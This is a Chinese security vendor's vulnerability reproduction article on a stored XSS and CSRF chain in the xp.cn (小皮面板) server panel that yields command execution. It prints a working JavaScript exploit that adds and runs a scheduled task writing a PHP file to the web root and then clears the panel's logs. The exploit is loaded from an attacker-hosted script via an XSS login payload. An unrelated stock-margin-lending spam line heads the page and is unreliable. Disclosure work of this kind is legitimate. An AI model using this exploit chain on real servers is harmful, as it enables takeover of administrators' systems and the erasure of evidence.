买股票怎么加杠杆佰朔资本介绍-k线图形态24种经典图解-【东方资本】,股票配资交易app,配资炒股比例国家规定是多少,配资在线平台排行榜

提交需求
*
*

*
*
*
立即提交
點擊”立即提交”,表明我理解并同意 《美創科技隱私條款》

logo

    產品與服務
    解決方案
    技術支持
    合作發展
    關于美創

    申請試用
      小皮面板任意命令執行漏洞復現
      發布時間:2023-02-24 閱讀次數: 808 次
      01
      漏洞簡介

      小皮面板集安全、高效、功能于一體。支持一鍵LAMP、LNMP、集群、監控、網站、數據庫、FTP、軟件中心、偽靜態、云備份、SSL、多版本共存、Nginx反向代理、服務器防火墻、web防火墻、監控大屏等100多項服務器管理功能。小皮面板登錄接口的username參數值存在存儲性XSS漏洞,可通過該存儲性XSS漏洞將計劃任務寫入小皮面板服務器,從而達到命令執行效果。

      02
      影響版本

      • V0.1
      • V0.101
      • V0.102

      03
      環境搭建

      訪問


      https://www.xp.cn/windows-panel.html

      點擊立即下載

      圖片

      下載完成后運行安裝程序進行安裝

      圖片

      安裝完成后,桌面生成”小皮面板初始信息.txt”,文本文件中包含面板地址、面板賬號密碼

      圖片

      訪問面板地址


      http://:9080/8D92C9

      出現以下界面代表安裝成功

      圖片
      04
      漏洞復現

      如圖所示,在登錄界面用戶名欄輸入payload:<script>alert(1)</script>,密碼欄輸入任意,驗證碼欄輸入正確的驗證碼,輸入完畢后點擊登錄

      圖片

      再次將用戶名、密碼、驗證碼欄處輸入正確的用戶名、密碼以及驗證碼

      圖片

      登錄系統后,將觸發xss漏洞

      圖片

      漏洞起因是由于操作日志中記錄了登錄失敗的用戶名,且輸出用戶名時未進行html編碼

      圖片

      小皮面板后臺可以編輯服務器的計劃任務,且編輯計劃任務處未校驗csrf token與referer,所以編輯計劃任務處存在csrf漏洞,可利用存儲性XSS與csrf漏洞添加計劃任務以達到命令執行效果。

      構造如下JS文件,JS文件內容為發送創建計劃任務請求

















      function poc(){  $.get('/service/app/tasks.php?type=task_list',{},function(data){    var id=data.data[0].ID;    $.post('/service/app/tasks.php?type=exec_task',{      tid:id    },function(res2){        $.post('/service/app/log.php?type=clearlog',{         },function(res3){},"json");      },"json");  },"json");}function save(){  var data=new Object();  data.task_id="";  data.title="test";  data.exec_cycle="1";  data.week="1";  data.day="3";  data.hour="12";  data.minute = "00";  data.shell='echo "<?php phpinfo();?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';  $.post('/service/app/tasks.php?type=save_shell',data,function(res){    poc();  },'json');}save();
      圖片

      將該JS文件放置在小皮面板能夠訪問到的web應用中

      在小皮面板的登錄界面構造xss payload


      <script src=”http://ip:port/test.js”></script>

      輸入任意密碼與正確的驗證碼,點擊登錄

      圖片

      使用正確的賬號密碼登錄小皮面板

      圖片

      如圖所示,計劃任務列表中新的計劃任務被添加

      圖片

      訪問


      http://ip/1.php

      出現phpinfo函數界面

      圖片

      05
      漏洞修復

      將小皮面板版本升至最新


      免費試用
      服務熱線

      馬上咨詢

      400-811-3777

      回到頂部